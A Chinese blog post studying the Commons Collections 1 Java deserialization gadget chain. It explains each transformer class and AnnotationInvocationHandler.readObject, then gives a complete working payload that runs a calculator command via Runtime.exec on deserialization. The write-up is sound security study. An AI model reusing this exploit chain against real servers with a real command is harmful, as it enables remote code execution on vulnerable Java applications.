<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.8.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"x-f1v3.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"hide","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Commonscollections 系列反序列化学习">
<meta name="keywords" content="Java,反序列化,代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="Commonscollections1 反序列化">
<meta property="og:url" content="http://x-f1v3.github.io/blog/1604562905880.html">
<meta property="og:site_name" content="F1v3&#39;s Notes">
<meta property="og:description" content="Commonscollections 系列反序列化学习">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563052923.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563132390.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563153671.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563167594.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563187942.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563200521.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563213543.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563228530.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563240088.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563250718.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563271107.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563282617.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563296689.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563313656.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563326217.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563338653.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563349603.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563367123.png">
<meta property="og:image" content="http://x-f1v3.github.io/images/1604563382564.png">
<meta property="og:updated_time" content="2020-11-05T08:09:12.821Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Commonscollections1 反序列化">
<meta name="twitter:description" content="Commonscollections 系列反序列化学习">
<meta name="twitter:image" content="http://x-f1v3.github.io/images/1604563052923.png">

<link rel="canonical" href="http://x-f1v3.github.io/blog/1604562905880.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>Commonscollections1 反序列化 | F1v3's Notes</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">F1v3's Notes</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" placeholder="Searching..." spellcheck="false" type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://x-f1v3.github.io/blog/1604562905880.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="F1v3">
      <meta itemprop="description" content="F1v3's Notes">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="F1v3's Notes">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Commonscollections1 反序列化
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-11-05 15:55:05 / Modified: 16:09:12" itemprop="dateCreated datePublished" datetime="2020-11-05T15:55:05+08:00">2020-11-05</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Java代码审计/" itemprop="url" rel="index"><span itemprop="name">Java代码审计</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>13k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>12 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>Commonscollections 系列反序列化学习<br><a id="more"></a></p>
<h2 id="依赖环境"><a href="#依赖环境" class="headerlink" title="依赖环境"></a>依赖环境</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Commons Collections 3.1</span><br><span class="line">jdk7或jdk8</span><br></pre></td></tr></table></figure>
<h2 id="触发流程"><a href="#触发流程" class="headerlink" title="触发流程"></a>触发流程</h2><h3 id="Payload1"><a href="#Payload1" class="headerlink" title="Payload1"></a>Payload1</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">ObjectInputStream.readObject()</span><br><span class="line">           AnnotationInvocationHandler.readObject()</span><br><span class="line">               Map(Proxy).setValue()</span><br><span class="line">                       TransformedMap.checkSetValue()</span><br><span class="line">                           ChainedTransformer.transform()</span><br><span class="line">                               ConstantTransformer.transform()</span><br><span class="line">                               InvokerTransformer.transform()</span><br><span class="line">                                   Method.invoke()</span><br><span class="line">                                       Class.getMethod()</span><br><span class="line">                               InvokerTransformer.transform()</span><br><span class="line">                                   Method.invoke()</span><br><span class="line">                                       Runtime.getRuntime()</span><br><span class="line">                               InvokerTransformer.transform()</span><br><span class="line">                                   Method.invoke()</span><br><span class="line">                                       Runtime.exec()</span><br></pre></td></tr></table></figure>
<p>按照触发流程，调试分析，先看 <code>InvokerTransformer</code> 类：<br><img src="http://x-f1v3.github.io/images/1604563052923.png" alt="image"></p>
<p>存在一个构造方法接收3个参数，包括方法名，参数类，参数值，<br>存在 <code>transform</code> 方法，接收的参数是某个类，然后反射调用这个类，并执行通过构造方法中所获得的方法，可以看到类、方法、参数都是从外部输入，也就是说能够执行任意类的含任意参数的任意方法。<br>在看 <code>ConstantTransformer</code> 类：</p>
<p><img src="http://x-f1v3.github.io/images/1604563132390.png" alt="image"></p>
<p>构造方法是接收一个任意类，<code>transform</code> 方法是无论参数是什么，都会直接返回通过构造方法获得的任意类，<br>接下来是 <code>ChainedTransformer</code> 类：</p>
<p><img src="http://x-f1v3.github.io/images/1604563153671.png" alt="image"></p>
<p>构造方法是接收一个 <code>Transformer</code> 类数组，<code>transform</code> 方法是依次执行 <code>Transformer</code> 类数组中每一个 <code>Transformer</code> 类的 <code>transform</code> 方法，且每一个<code>transform</code> 方法得到的返回值，都是后面的 <code>transform</code> 方法的参数。<br>而前面说到 <code>ConstantTransformer</code> 类的 <code>transform</code> 方法无论参数是什么，都会直接返回通过构造方法获得的任意类。这就非常适合当作 <code>Transformer</code> 类数组的第一个元素。再加上 <code>InvokerTransformer</code> 类的 <code>transform</code> 方法能够执行任意类的含任意参数的任意方法,就能够构造出执行命令的点：</p>
<p><img src="http://x-f1v3.github.io/images/1604563167594.png" alt="image"></p>
<p>payload：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = &#123;</span><br><span class="line">    <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line">    <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]&#123; String.class, Class[].class&#125;, <span class="keyword">new</span> Object[]&#123;<span class="string">"getRuntime"</span>, <span class="keyword">new</span> Class[<span class="number">0</span>] &#125;),</span><br><span class="line">    <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]&#123; Object.class, Object[].class&#125;, <span class="keyword">new</span> Object[]&#123; <span class="keyword">null</span> ,<span class="keyword">new</span> Object[<span class="number">0</span>]&#125; ),</span><br><span class="line">    <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,<span class="keyword">new</span> Class[] &#123;String.class &#125;,<span class="keyword">new</span> Object[] &#123;<span class="string">"open /Applications/Calculator.app"</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">ChainedTransformer Chain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">Chain.transform(<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></p>
<p>构造的 payload 也是非常巧妙，运用反射调用反射，仔细研究下的话，实际还是有点复杂的，需要对 Java 反射机制运用的非常熟练才行。<br>一行一行分析:<br><code>new ConstantTransformer(Runtime.class)</code> 由之前的分析得出会返回 <code>Runtime.class</code> 并且作为参数会传入到下个 <code>InvokerTransformer.transform</code> 中，<br><code>new InvokerTransformer(&quot;getMethod&quot;, new Class[]{ String.class, Class[].class}, new Object[]{&quot;getRuntime&quot;, new Class[0] })</code> 得到 <code>Runtime.class</code> 参数，这里注意的是，由于传入的是 <code>Runtime.class</code> 是类，而不是类实例，所以 <code>input.getClass()</code> 得到的是 <code>java.lang.Class</code>,而不是 <code>java.lang.Runtime</code>:<br><img src="http://x-f1v3.github.io/images/1604563187942.png" alt="image"></p>
<p>这也是我们无法直接通过反射调用 <code>getRuntime</code> 方法，而需要通过反射调用反射调用<code>getRuntime</code> 方法的原因。这里通过反射调用 <code>getMethod</code> 方法，参数是 <code>getRuntime</code>。最后调用 <code>getMethod</code> 方法时，因为 <code>invoke</code> 的第一个参数还是 <code>Runtime.class</code>。所以后面能正确执行 <code>getRuntime</code> 方法。<br><img src="http://x-f1v3.github.io/images/1604563200521.png" alt="image"></p>
<p><code>new InvokerTransformer(&quot;invoke&quot;, new Class[]{ Object.class, Object[].class}, new Object[]{ null ,new Object[0]})</code>，这里就是通过反射调用 <code>invoke</code> 方法，执行前面的 <code>getMethod</code> 方法,相当于第二层反射，真正执行的是 <code>getRuntime</code>，最终返回 <code>Runtime</code> 实例。<br><img src="http://x-f1v3.github.io/images/1604563213543.png" alt="image"></p>
<p><code>new InvokerTransformer(&quot;exec&quot;,new Class[] {String.class },new Object[] {&quot;open /Applications/Calculator.app&quot;})</code> 最后执行 <code>Runtime</code> 实例的 <code>exec</code> 方法，执行系统命令。<br>为了方便理解，抽象出来的代码：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Object a = Runtime.class.getClass().getMethod(<span class="string">"getMethod"</span>,<span class="keyword">new</span> Class[]&#123; String.class, Class[].class&#125;).invoke(Runtime.class,<span class="string">"getRuntime"</span>, <span class="keyword">new</span> Class[<span class="number">0</span>]);</span><br><span class="line">Object b = a.getClass().getMethod(<span class="string">"invoke"</span>,<span class="keyword">new</span> Class[]&#123; Object.class, Object[].class&#125;).invoke(a,<span class="keyword">new</span> Object[]&#123; <span class="keyword">null</span> ,<span class="keyword">new</span> Object[<span class="number">0</span>]&#125;);</span><br><span class="line">b.getClass().getMethod(<span class="string">"exec"</span>,String.class ).invoke(b,<span class="string">"open /Applications/Calculator.app"</span>);</span><br></pre></td></tr></table></figure></p>
<p><img src="http://x-f1v3.github.io/images/1604563228530.png" alt="image"></p>
<p>看看其他大佬的图：<br><img src="http://x-f1v3.github.io/images/1604563240088.png" alt="image"></p>
<p>总的来说，第一层反射只是外壳，里面的通过反射调用 <code>getRuntime</code> 方法，获取 <code>Runtime</code> 实例是精华。大佬就是牛逼。<br>继续分析，既然通过一顿操作知道了 <code>ChainedTransformer.transform</code> 能够执行命令，那么还需要找到能自动触发这行代码的地方。<br>看到反序列化的利用链 <code>TransformedMap.checkSetValue()</code><br><img src="http://x-f1v3.github.io/images/1604563250718.png" alt="image"></p>
<p>可以看到该方法，会执行 <code>this.valueTransformer.transform(value)</code> ，而 <code>this.valueTransformer</code> 可以通过 <code>decorate</code> 方法进行赋值，同时也可以传入一个 <code>map</code>类。</p>
<blockquote>
<p>TransformedMap.decorate方法,预期是对Map类的数据结构进行转化，该方法有三个参数。第一个参数为待转化的Map对象，第二个参数为Map对象内的key要经过的转化方法，第三个参数为Map对象内的value要经过的转化方法。</p>
</blockquote>
<p>所以这段按照要求进行如下构造：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = &#123;</span><br><span class="line">    <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line">    <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]&#123; String.class, Class[].class&#125;, <span class="keyword">new</span> Object[]&#123;<span class="string">"getRuntime"</span>, <span class="keyword">new</span> Class[<span class="number">0</span>] &#125;),</span><br><span class="line">    <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]&#123; Object.class, Object[].class&#125;, <span class="keyword">new</span> Object[]&#123; <span class="keyword">null</span> ,<span class="keyword">new</span> Object[<span class="number">0</span>]&#125; ),</span><br><span class="line">    <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,</span><br><span class="line">    <span class="keyword">new</span> Class[] &#123;String.class &#125;,</span><br><span class="line">    <span class="keyword">new</span> Object[] &#123;<span class="string">"open /Applications/Calculator.app"</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line">Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">Map map = <span class="keyword">new</span> HashMap();</span><br><span class="line">map.put(<span class="string">"1"</span>, <span class="string">"2"</span>);</span><br><span class="line">Map transformedmap = TransformedMap.decorate(map, <span class="keyword">null</span>, transformerChain);</span><br></pre></td></tr></table></figure></p>
<p>现在只需找到在某个类的 <code>readObject</code> 方法中直接或者间接调用 <code>TransformedMap.checkSetValue()</code> 即可。<br>直接看到反序列化利用链的 <code>AnnotationInvocationHandler.readObject</code> 方法：<br><img src="http://x-f1v3.github.io/images/1604563271107.png" alt="image"></p>
<p><code>this.memberValues</code> 和 <code>this.type</code> 都可以通过构造方法传入，也就是都是我们可控制的，<code>this.memberValues</code> 是 <code>Map</code> 类型，先不管前面的各种判断，假设都成立，定位到 $\color{rgb(255,0,0)}{var5.setValue}$，<code>var5</code> 就是传入 <code>map</code> 的一个 <code>Entry</code> 类，实际我们传入的是 <code>map</code> 的子类 <code>TransformedMap</code>, 而 <code>TransformedMap</code> 并没有 <code>setValue</code> 方法，所以往上追溯到其直接父类 <code>AbstractInputCheckedMapDecorator</code>:<br><img src="http://x-f1v3.github.io/images/1604563282617.png" alt="image"></p>
<p>可以看到，<code>setValue</code> 方法中，正好执行了 <code>checkSetValue</code> 方法，在父类中，<code>checkSetValue</code> 是抽象方法，所以会执行子类中的 <code>checkSetValue</code> ，也就是 <code>TransformedMap.checkSetValue()</code>,达到了我们想要的目的，至于具体如何执行到这个 <code>setValue</code> 方法，涉及到 <code>Map</code> 里的静态内部类 <code>MapEntry</code>、<code>EntrySet</code>和其他方法的联动，就不再赘述了。<br>重新整理 payload,加上利用 <code>AnnotationInvocationHandler.readObject</code>的部分：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = &#123;</span><br><span class="line">    <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line">    <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]&#123; String.class, Class[].class&#125;, <span class="keyword">new</span> Object[]&#123;<span class="string">"getRuntime"</span>, <span class="keyword">new</span> Class[<span class="number">0</span>] &#125;),</span><br><span class="line">    <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]&#123; Object.class, Object[].class&#125;, <span class="keyword">new</span> Object[]&#123; <span class="keyword">null</span> ,<span class="keyword">new</span> Object[<span class="number">0</span>]&#125; ),</span><br><span class="line">    <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,</span><br><span class="line">    <span class="keyword">new</span> Class[] &#123;String.class &#125;,</span><br><span class="line">    <span class="keyword">new</span> Object[] &#123;<span class="string">"open /Applications/Calculator.app"</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line">Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">Map map = <span class="keyword">new</span> HashMap();</span><br><span class="line">map.put(<span class="string">"1"</span>, <span class="string">"2"</span>);</span><br><span class="line">Map transformedmap = TransformedMap.decorate(map, <span class="keyword">null</span>, transformerChain);</span><br><span class="line"></span><br><span class="line">Class clazz = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line">Constructor cons = clazz.getDeclaredConstructor(Class.class,Map.class);</span><br><span class="line">cons.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">Object ins = cons.newInstance(注解类,transformedmap);</span><br></pre></td></tr></table></figure></p>
<p>现在就剩下最后一个问题了，就是如何满足 <code>readObject</code> 中的各种条件，重新看到该方法：<br><img src="http://x-f1v3.github.io/images/1604563296689.png" alt="image"></p>
<p>从构造方法可以看出 <code>this.type</code> 是注解类，<br><code>var2 = AnnotationType.getInstance(this.type)</code> 是获取该注解类的详细信息，<br><code>Map var3 = var2.memberTypes();</code> 获取该注解类的成员变量的名称及类型，这里需要对 java 的注解有个基本了解，以 <code>javax.xml.ws.Action</code> 这个注解为例，<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Documented</span></span><br><span class="line"><span class="meta">@Retention</span>(RetentionPolicy.RUNTIME)</span><br><span class="line"><span class="meta">@Target</span>(ElementType.METHOD)</span><br><span class="line"><span class="keyword">public</span> <span class="meta">@interface</span> Action &#123;</span><br><span class="line"></span><br><span class="line">  <span class="comment">//input是成员变量，String 是其类型，默认值是""</span></span><br><span class="line">    <span class="function">String <span class="title">input</span><span class="params">()</span> <span class="keyword">default</span> ""</span>;</span><br><span class="line">    <span class="function">String <span class="title">output</span><span class="params">()</span> <span class="keyword">default</span> ""</span>;</span><br><span class="line">    FaultAction[] fault() <span class="keyword">default</span> &#123; &#125;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>接下来就是对传入的 <code>this.memberValues</code> 和 <code>this.type</code> 相互校验：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">while</span>(var4.hasNext()) &#123;</span><br><span class="line">    Entry var5 = (Entry)var4.next();</span><br><span class="line">    <span class="comment">// var6 是 传入 map 的 key 值</span></span><br><span class="line">    String var6 = (String)var5.getKey();</span><br><span class="line">    <span class="comment">// var7 是根据 var6 取出的 注解成员变量的类，</span></span><br><span class="line">    Class var7 = (Class)var3.get(var6);</span><br><span class="line">    <span class="comment">// var7 不为空，也就是说传入 map 的 key 必须是传入注解类的 成员变量名</span></span><br><span class="line">    <span class="keyword">if</span> (var7 != <span class="keyword">null</span>) &#123;</span><br><span class="line">        Object var8 = var5.getValue();</span><br><span class="line">        <span class="comment">//传入 map 的 value 值必须不是传入注解类的成员变量的类的实例化对象，</span></span><br><span class="line">        <span class="keyword">if</span> (!var7.isInstance(var8) &amp;&amp; !(var8 <span class="keyword">instanceof</span> ExceptionProxy)) &#123;</span><br><span class="line">            var5.setValue((<span class="keyword">new</span> AnnotationTypeMismatchExceptionProxy(var8.getClass() + <span class="string">"["</span> + var8 + <span class="string">"]"</span>)).setMember((Method)var2.members().get(var6)));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>很明显的看出传入的 <code>map</code> 类和注解类要满足相关的条件，假设传入的注解类是 <code>javax.xml.ws.Action</code> ,那么按照以上分析的要求，<code>map</code> 的操作可以是<code>map.put(&quot;input&quot;, 1);</code>。<br>最终的 payload：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = &#123;</span><br><span class="line">        <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line">        <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]&#123; String.class, Class[].class&#125;, <span class="keyword">new</span> Object[]&#123;<span class="string">"getRuntime"</span>, <span class="keyword">new</span> Class[<span class="number">0</span>] &#125;),</span><br><span class="line">        <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]&#123; Object.class, Object[].class&#125;, <span class="keyword">new</span> Object[]&#123; <span class="keyword">null</span> ,<span class="keyword">new</span> Object[<span class="number">0</span>]&#125; ),</span><br><span class="line">        <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,</span><br><span class="line">                <span class="keyword">new</span> Class[] &#123;String.class &#125;,</span><br><span class="line">                <span class="keyword">new</span> Object[] &#123;<span class="string">"open /Applications/Calculator.app"</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line">Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line"> Map map = <span class="keyword">new</span> HashMap();</span><br><span class="line">map.put(<span class="string">"input"</span>, <span class="number">1</span>);</span><br><span class="line"> Map transformedmap = TransformedMap.decorate(map, <span class="keyword">null</span>, transformerChain);</span><br><span class="line">  Class clazz = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line">Constructor cons = clazz.getDeclaredConstructor(Class.class,Map.class);</span><br><span class="line">cons.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"></span><br><span class="line">Object ins = cons.newInstance(javax.xml.ws.Action.class,transformedmap);</span><br><span class="line"> <span class="keyword">try</span>&#123;</span><br><span class="line">    ObjectOutputStream outputStream = <span class="keyword">new</span> ObjectOutputStream(<span class="keyword">new</span> FileOutputStream(<span class="string">"tmp.cer"</span>));</span><br><span class="line">    outputStream.writeObject(ins);</span><br><span class="line">    outputStream.close();</span><br><span class="line">     ObjectInputStream inputStream = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> FileInputStream(<span class="string">"tmp.cer"</span>));</span><br><span class="line">    inputStream.readObject();</span><br><span class="line">&#125;<span class="keyword">catch</span>(Exception e)&#123;</span><br><span class="line">    e.printStackTrace();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p><img src="http://x-f1v3.github.io/images/1604563313656.png" alt="image"></p>
